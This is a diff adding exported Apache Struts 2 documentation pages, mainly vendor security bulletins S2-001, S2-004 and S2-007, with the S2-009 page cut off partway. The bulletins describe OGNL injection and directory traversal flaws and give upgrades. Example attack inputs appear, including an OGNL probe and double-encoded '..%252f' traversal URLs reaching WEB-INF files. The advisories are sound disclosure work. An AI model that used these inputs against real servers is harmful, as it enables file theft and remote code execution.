+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="guides.html">Guides</a>&nbsp;&gt;&nbsp;<a href="core-developers-guide.html">Core Developers Guide</a>&nbsp;&gt;&nbsp;<a href="interceptors.html">Interceptors</a>&nbsp;&gt;&nbsp;<a href="roles-interceptor.html">Roles Interceptor</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">Roles Interceptor</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=28547">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=28547">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=28547">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=28547">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=28547">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=28547">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><p>will only be executed if the user has the correct role. </p></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file

Added: websites/production/struts/content/development/2.x/docs/s2-001.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-001.html (added)
+++ websites/production/struts/content/development/2.x/docs/s2-001.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,178 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushXml.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>S2-001</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="security-bulletins.html">Security Bulletins</a>&nbsp;&gt;&nbsp;<a href="s2-001.html">S2-001</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">S2-001</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=61776">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=61776">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=61776">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=61776">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=61776">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=61776">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><h2><a shape="rect" name="S2-001-Summary"></a>Summary</h2>
+
+
+<p>Remote code exploit on form validation error</p>
+
+
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><th colspan="1" rowspan="1" class="confluenceTh">Who should read this</th><td colspan="1" rowspan="1" class="confluenceTd">All Struts 2 developers</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Impact of vulnerability</th><td colspan="1" rowspan="1" class="confluenceTd">Remote code execution</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Maximum security rating</th><td colspan="1" rowspan="1" class="confluenceTd">Critical</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Recommendation</th><td colspan="1" rowspan="1" class="confluenceTd">Developers should immediately upgrade to <a shape="rect" class="external-link" href="http://people.apache.org/builds/struts/2.0.9/">Struts 2.0.9</a> or upgrade to <a shape="rect" class="external-link" href="http://www.opensymphony.com/xwork/download.action" rel="nofollow">XWork 2.0.4</a></td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Affected Software<
 /th><td colspan="1" rowspan="1" class="confluenceTd"> WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 - WebWork 2.2.5, Struts 2.0.0 - Struts 2.0.8 </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Non-Affected Software</th><td colspan="1" rowspan="1" class="confluenceTd"> WebWork 2.0, WebWork 2.1 (with altSyntax disabled, which is the default)</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Original JIRA Ticket</th><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" class="external-link" href="http://issues.apache.org/struts/browse/WW-2030">WW-2030</a></td></tr></tbody></table>
+</div>
+
+
+<h2><a shape="rect" name="S2-001-Problem"></a>Problem</h2>
+
+<p>The 'altSyntax' feature of WebWork 2.1+ and Struts 2 allows OGNL expressions to be inserted into text strings and is processed recursively.  This allows a malicious user to submit a string, usually through an HTML text field, containing an OGNL expression that will then be executed by the server if the form validation has failed.  For example, say we had this form that required the 'phoneNumber' field to not be blank:</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: html; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;s:form action="editUser"&gt;
+  &lt;s:textfield name="name" /&gt;
+  &lt;s:textfield name="phoneNumber" /&gt;
+&lt;/s:form&gt;
+]]></script>
+</div></div>
+
+<p>The user could leave the 'phoneNumber' field blank to trigger the validation error, then populate the 'name' field with %{1+1}.  When the form is re-displayed to the user, the value of the 'name' field will be '2'.  The reason is the value field is, by default, processed as %{name}, and since OGNL expressions are evaluated recursively, it is evaluated as if the expression was %{%{1+1}}.</p>
+
+<p>The OGNL parsing code is actually in XWork and not in WebWork 2 or Struts 2.</p>
+
+<h2><a shape="rect" name="S2-001-Solution"></a>Solution</h2>
+
+<p>As of XWork 2.0.4, the OGNL parsing is changed so that it is not recursive.  Therefore, in the example above, the result will be the expected %{1+1}.  You can either obtain the <a shape="rect" class="external-link" href="http://www.opensymphony.com/webwork/download.action" rel="nofollow">WebWork 2.0.4</a> or <a shape="rect" class="external-link" href="http://people.apache.org/builds/struts/2.0.9/">Struts 2.0.9</a>, which contains the corrected XWork library.  Alternatively, you can obtain the patch and apply it to the XWork source code yourself. </p></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file

Added: websites/production/struts/content/development/2.x/docs/s2-004.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-004.html (added)
+++ websites/production/struts/content/development/2.x/docs/s2-004.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,164 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>S2-004</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="security-bulletins.html">Security Bulletins</a>&nbsp;&gt;&nbsp;<a href="s2-004.html">S2-004</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">S2-004</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=99572">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=99572">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=99572">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=99572">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=99572">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=99572">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><h2><a shape="rect" name="S2-004-Summary"></a>Summary</h2>
+
+<p>Directory traversal vulnerability while serving static content</p>
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><th colspan="1" rowspan="1" class="confluenceTh"> Who should read this </th><td colspan="1" rowspan="1" class="confluenceTd"> All Struts 2 developers </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Impact of vulnerability </th><td colspan="1" rowspan="1" class="confluenceTd"> Read access to server filesystem resources (under certain application server environments) </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Maximum security rating </th><td colspan="1" rowspan="1" class="confluenceTd"> Important </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Recommendation </th><td colspan="1" rowspan="1" class="confluenceTd"> Developers should upgrade to <a shape="rect" class="external-link" href="http://people.apache.org/builds/struts/2.0.12/">Struts 2.0.12</a> </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Affected Software </th><td colspan="1" rowspan="1" class="confluenceTd"> Struts 2
 .0.0 - Struts 2.0.11.2 </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Original JIRA Ticket </th><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" class="external-link" href="https://issues.apache.org/struts/browse/WW-2779">WW-2779</a> </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Reporter </th><td colspan="1" rowspan="1" class="confluenceTd"> Csaba Barta and L&#225;szl&#243; T&#243;th, PricewaterhouseCoopers </td></tr></tbody></table>
+</div>
+
+
+<h2><a shape="rect" name="S2-004-Problem"></a>Problem</h2>
+
+<p>The Struts2 dispatcher logic by design allows to serve certain static resources found in the classpath of the web application for request URIs having a context relative path starting with "/struts/".</p>
+
+<p>FilterDispatcher (in 2.0) and DefaultStaticContentLoader (in 2.1) have a security vulnerability that allows an attacker to traverse the directory structure and download files outside the "static" content folder, using double-encoded urls and relative paths, like:</p>
+
+<p><a shape="rect" class="external-link" href="http://localhost:8080/struts2-blank-2.0.11.1/struts" rel="nofollow">http://localhost:8080/struts2-blank-2.0.11.1/struts</a>..</p>
+
+<p><a shape="rect" class="external-link" href="http://localhost:8080/struts2-blank-2.0.11.1/struts/..%252f" rel="nofollow">http://localhost:8080/struts2-blank-2.0.11.1/struts/..%252f</a></p>
+
+<p><a shape="rect" class="external-link" href="http://exampletomcat.com:8080/struts2-blank-2.0.11.1/struts/..%252f..%252f..%252fWEB-INF/classess/example/Login.class/" rel="nofollow">http://exampletomcat.com:8080/struts2-blank-2.0.11.1/struts/..%252f..%252f..%252fWEB-INF/classess/example/Login.class/</a></p>
+
+<p>Although not all container are vulnerable to this, the Struts2 dispatcher logic has to prevent access to static content outside the static resource folders.</p>
+
+<h2><a shape="rect" name="S2-004-Solution"></a>Solution</h2>
+
+<p>As of Struts 2.0.12, the dispatcher logic was improved to correctly decode and normalize the request path before checking if static content serving applies for a given request.</p>
+
+<p>You can obtain <a shape="rect" class="external-link" href="http://people.apache.org/builds/struts/2.0.12/">Struts 2.0.12</a> as a drop in replacement for Struts 2.0.11.2 to get the fixed Struts 2 core library.</p></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file

Added: websites/production/struts/content/development/2.x/docs/s2-007.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-007.html (added)
+++ websites/production/struts/content/development/2.x/docs/s2-007.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,156 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>S2-007</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="security-bulletins.html">Security Bulletins</a>&nbsp;&gt;&nbsp;<a href="s2-007.html">S2-007</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">S2-007</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=27826393">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=27826393">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=27826393">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=27826393">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=27826393">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=27826393">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><h2><a shape="rect" name="S2-007-Summary"></a>Summary</h2>
+
+
+<p>User input is evaluated as an OGNL expression when there's a conversion error</p>
+
+
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><th colspan="1" rowspan="1" class="confluenceTh"> Who should read this </th><td colspan="1" rowspan="1" class="confluenceTd"> All Struts 2 developers </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Impact of vulnerability </th><td colspan="1" rowspan="1" class="confluenceTd"> Remote Code Execution </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Maximum security rating </th><td colspan="1" rowspan="1" class="confluenceTd"> Important </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Recommendation </th><td colspan="1" rowspan="1" class="confluenceTd"> Developers should either upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts2231">Struts 2.2.3.1</a> or apply the configuration changes described below </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Affected Software </th><td colspan="1" rowspan="1" class="confluenceTd"> Struts 2.0.0 - S
 truts 2.2.3 </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Original JIRA Tickets </th><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" class="external-link" href="https://issues.apache.org/jira/browse/WW-3668">WW-3668</a> </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Reporter </th><td colspan="1" rowspan="1" class="confluenceTd"> Hideyuki Suzumi<br clear="none" class="atl-forced-newline"> </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> CVE Identifier </th><td colspan="1" rowspan="1" class="confluenceTd"> - </td></tr></tbody></table>
+</div>
+
+
+<h2><a shape="rect" name="S2-007-Problem"></a>Problem</h2>
+
+<p>User input is evaluated as an OGNL expression when there's a conversion error. This allows a malicious user to execute arbitrary code.&#160;<br clear="none">
+A more detailed description is found in the referenced <a shape="rect" class="external-link" href="https://issues.apache.org/jira/browse/WW-3668">JIRA ticket</a>.</p>
+
+<h2><a shape="rect" name="S2-007-Solution"></a>Solution</h2>
+
+<p>Upgrade to&#160;<a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts2231">Struts 2.2.3.1</a>.</p></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file

Added: websites/production/struts/content/development/2.x/docs/s2-009.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-009.html (added)
+++ websites/production/struts/content/development/2.x/docs/s2-009.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,243 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
